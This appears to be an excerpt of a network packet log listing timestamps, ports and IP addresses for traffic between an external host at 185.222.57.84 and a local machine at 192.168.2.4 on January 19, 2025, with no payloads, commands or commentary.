Jan 19, 2025 13:02:22.572704077 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572712898 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572731018 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572758913 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572787046 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572808981 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572814941 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572839975 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572841883 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572865963 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572870016 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572896957 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572937965 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572952986 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572982073 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572987080 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.573009968 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.573018074 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.573036909 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.573045969 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.573065042 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.573071003 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.573092937 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.573098898 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.573122025 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.573137999 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.573148966 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.573175907 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.573203087 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.573206902 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.573230982 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.573239088 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.573257923 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.573286057 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.573309898 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.573309898 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.573338032 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.573395014 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.574459076 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.574542046 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.574558973 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.574588060 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.574618101 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.574645996 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.574750900 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.574779987 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.574806929 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.574829102 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.574856043 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.578300953 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578330040 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578378916 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.578382015 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578409910 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578438997 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578469038 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578469992 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.578521013 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578525066 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.578550100 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578577042 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578598976 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.578604937 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578629017 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.578650951 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.578655958 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578685045 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578711033 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578717947 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.578739882 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578742981 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.578768969 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.578789949 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578795910 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.578820944 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578849077 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578875065 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.578877926 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578932047 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578936100 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.578959942 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578989029 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.578989983 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579015970 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579016924 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579077005 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579077005 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579104900 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579133034 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579135895 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579169989 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579189062 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579195023 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579219103 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579247952 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579267979 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579274893 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579297066 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579344988 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579355001 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579395056 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579423904 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579452991 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579457045 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579482079 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579514027 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579531908 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579545975 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579561949 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579591036 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579619884 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579622030 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579652071 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579674959 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579679012 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579703093 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579730034 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579732895 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579781055 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579787970 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579818010 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579843998 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579871893 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579874992 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579899073 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579901934 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579926014 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579952002 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.579952955 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.579982996 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580010891 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.580012083 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580039978 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580056906 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.580094099 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580101967 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.580125093 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580153942 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580182076 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580199957 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.580209970 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580233097 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.580238104 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580291986 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580301046 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.580319881 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580348015 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580375910 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580400944 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.580403090 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580430984 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580457926 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580462933 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.580483913 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580492973 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.580534935 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.580534935 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580564022 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580590963 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580617905 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580627918 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.580645084 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.580657005 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.580878973 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.624228001 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.624464989 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.624608994 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.624732018 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.624860048 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.624939919 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.667216063 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.667565107 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.667772055 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.667879105 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.668024063 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.668119907 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.668237925 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.672607899 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.672676086 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.672700882 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.672714949 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.672756910 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.672770023 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.672775984 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.672794104 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.672806978 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.672822952 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.672893047 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.672907114 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.672935963 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.672950029 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.672957897 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673049927 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673063040 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673077106 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673103094 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673115969 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673141003 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673154116 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673224926 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673238039 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673280954 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673294067 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673342943 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673357010 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673388004 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673402071 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673413038 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673441887 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673455000 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673466921 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673491955 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673505068 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673540115 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673566103 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673580885 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673593044 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673660040 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673672915 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673700094 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673712969 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673727036 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673739910 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673764944 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673784971 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673852921 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673866987 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673891068 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673903942 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673918962 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673958063 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673988104 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.673999071 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674021959 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674034119 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674046993 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674149990 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674232960 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674247980 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674302101 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674315929 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674340963 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674354076 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674380064 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674392939 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674416065 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674428940 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674480915 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674494982 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674521923 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674535036 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674559116 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674572945 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674632072 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674644947 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674664021 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674689054 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674704075 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674716949 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674732924 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674757957 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674812078 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674825907 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674854040 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674866915 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674881935 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674896955 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674922943 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674935102 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674958944 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.674972057 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675048113 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675072908 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675086021 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675097942 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675124884 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675158024 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675170898 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675184965 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675247908 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675261974 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675287962 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675301075 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675334930 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675348043 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675378084 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675390959 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675403118 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675427914 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675441027 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675453901 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675478935 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675492048 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675517082 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675529957 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675554991 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675568104 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675590992 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675604105 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675618887 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675643921 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675753117 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675765991 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675779104 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675806046 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675817966 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675829887 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675853968 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675867081 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675879955 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675893068 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675909042 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675971985 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675986052 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.675998926 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676028013 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676040888 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676053047 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676085949 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676099062 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676111937 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676139116 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676151991 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676176071 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676188946 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676220894 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676234007 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676248074 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676263094 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676285982 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676297903 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676356077 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676369905 CET	55615	49744	185.222.57.84	192.168.2.4
